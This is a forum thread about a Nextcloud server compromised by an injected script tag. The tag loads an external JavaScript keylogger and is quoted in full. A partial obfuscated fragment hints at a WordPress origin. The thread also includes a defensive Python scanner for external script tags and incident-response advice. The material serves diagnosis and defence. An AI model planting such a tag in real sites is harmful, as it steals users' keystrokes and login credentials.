Nextcloud Server hacked

Hi everyone,

Suddenly my Nextcloud stopped working. On closer investigation I saw that a JS script had been added on top of the login page.

<script type='text/javascript' src='https://track.violetlovelines.com/src/back.js?v=2.0.5' async='true'></script>

Is there any easy way to remove this, like doing a “reinstall” or something similar?
By the way, most of my sites on that server were hacked by this script, so I doubt it's a problem with Nextcloud.

Maybe you can read this documentation and execute commands to find the files (not tested).

https://docs.nextcloud.com/server/latest/admin_manual/issues/code_signing.html

Do you use other web-based software, e.g. WordPress …

Post more details, e.g. the script itself. Search for parts of the script on the internet and post the results.

Yeah. This is one reason - amongst several others - that I use LXC to separate each and every web service. In truth, my HAProxy instance then runs fast-cgi to anything BUT Nextcloud, so only my NC container has the overhead of an additional webserver. The other web services are not mission critical and hold very little important data. However, if I had used NGINX as reverse proxy instead of HAProxy, I bet I could have spared the apache2. But the extra overhead is worth it for the added security in terms of segregation, so I am not sure I would have chosen that anyway.

Anyways. I ran the JS it points to through JS Deobfuscator - Unobfuscator - Online Javascript to Native Decoder.

It is a keylogger that sends the key presses asynchronously to an external address. I will not post it here, but you can follow it in a private window, copy the text on the screen, and run it through the above online unobfuscator. You will see that it is a JS-based keylogger.

However, this piece tells me it was a WordPress hack:

function _0x320b() {
 var unimplementedMethods = ["396114UBrarG", "getTime", "src", "5yjhmnQ", "542101ElmiFa", "wpcurrentadmin", "172743ORXpEk", "7091MiccWl", "738659VtOMud", "toUTCString", "insertBefore", "; expires=", "985563xDOOsM", "appendChild", "script", "7SpDjJV", "16608290NQmGyT", "split", "24GZSqIV", "1298788QqNMJn", "52ZioigQ", "318KWQXzl", "push", "length", "head", "wp-settings", "248960kBdeJg", "8991730kougUB", "12CLXHWv", "shift", 

“wpcurrentadmin”
“wp-settings”

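A defender-side check for the injection described in this thread, written as an added example (not code from any poster): walk a web root and report every `<script src=...>` tag whose host is neither first-party (relative URL) nor on an allowlist. The sample web root, the file names and the allowed host cloud.example.org are constructed; the injected tag is the one quoted at the top of the thread.

```python
import os
import re
import tempfile
from urllib.parse import urlparse

# Matches <script ... src="..."> in HTML/PHP templates (single or double quotes).
SCRIPT_SRC_RE = re.compile(r"<script\b[^>]*\bsrc=['\"]([^'\"]+)['\"]", re.IGNORECASE)
SCAN_EXTENSIONS = {".php", ".html", ".htm", ".js", ".tpl"}

def external_script_hosts(text, allowed_hosts):
    """Return script src URLs in text whose host is present and not in allowed_hosts.
    Relative URLs such as /core/js/x.js have no host and are treated as first-party."""
    findings = []
    for src in SCRIPT_SRC_RE.findall(text):
        host = urlparse(src).hostname  # None for "/x.js"; set for "//cdn.example/x.js"
        if host and host.lower() not in allowed_hosts:
            findings.append(src)
    return findings

def scan_webroot(root, allowed_hosts):
    """Walk root and return sorted [(relative_path, src), ...] for every external script."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in SCAN_EXTENSIONS:
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            for src in external_script_hosts(text, allowed_hosts):
                hits.append((os.path.relpath(path, root), src))
    return sorted(hits)

# Constructed sample: the tag quoted in the thread, prepended to a constructed login template.
INJECTED_TAG = ("<script type='text/javascript' "
                "src='https://track.violetlovelines.com/src/back.js?v=2.0.5' async='true'></script>")

def demo():
    """Build a throwaway web root with one clean and one injected file, then scan it."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "templates"))
        with open(os.path.join(root, "templates", "login.php"), "w") as fh:
            fh.write(INJECTED_TAG + "\n<!DOCTYPE html><html><head>"
                     "<script src='/core/js/main.js'></script></head></html>\n")
        with open(os.path.join(root, "index.php"), "w") as fh:
            fh.write("<?php echo 'clean file, no script tags'; ?>\n")
        return scan_webroot(root, allowed_hosts={"cloud.example.org"})

if __name__ == "__main__":
    for path, src in demo():
        print(f"{path}: loads external script {src}")
```

Run it against the real web root (scan_webroot("/path/to/webroot", {"your.host"})) to list the files to clean; a hit only tells you where the tag is, not how it got there.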

Ok. Then @roga, directly change the Nextcloud passwords. Also a good reason to use 2FA.

If someone manages to inject code into your Nextcloud, you have to consider your instance compromised. Just changing passwords or a simple reinstall won’t do it; the people attacking you can just do it again.
I’d consider backing up what you currently have (full disk backup), so you can investigate how the attacker could compromise your Nextcloud setup without the setup being online. Perhaps in the logs you can find whether they managed to access some files (unusual IPs etc.), but it is possible that, if they had full access, they cleaned the logs.

So then a WordPress issue shouldn’t compromise your Nextcloud. Or via the proxy?


Exactly. Even if they hacked my reverse proxy, they would need to independently and exclusively hack my Nextcloud “box”. No WordPress vulnerability works on Nextcloud. However, several WordPress vulnerabilities work to gain privileges on the webserver running WordPress, which is indeed a direct breach of Nextcloud as well, if Nextcloud is running on the same webserver (the www-data user is the user used by the webserver; this user owns all the Nextcloud folders and files). By separating these onto isolated islands, my Nextcloud is safe from a WordPress hack.

They could already inject their code into the communication (and before the data is encrypted), possibly extract passwords/data. I don’t know what else they should hack from your Nextcloud…

You wrote that they added a JavaScript to the Nextcloud login page, so you have a problem with your connection to Nextcloud. Was the JS part injected by the proxy or by the Nextcloud webserver?

You misunderstand. I took the JS script they injected on YOUR sites and ran it through a deobfuscator. I have not been hacked yet. They cannot compromise my site unless they rewrite my reverse proxy to terminate TLS locally, then proxy to Nextcloud over HTTPS; however, that would give itself away the instant they do it, as the certificate now offered by the reverse proxy instead of NC itself will, guaranteed, not be trusted.

No, they cannot inject it into the stream. I use TLS passthrough, hence the traffic is decrypted on the Nextcloud only.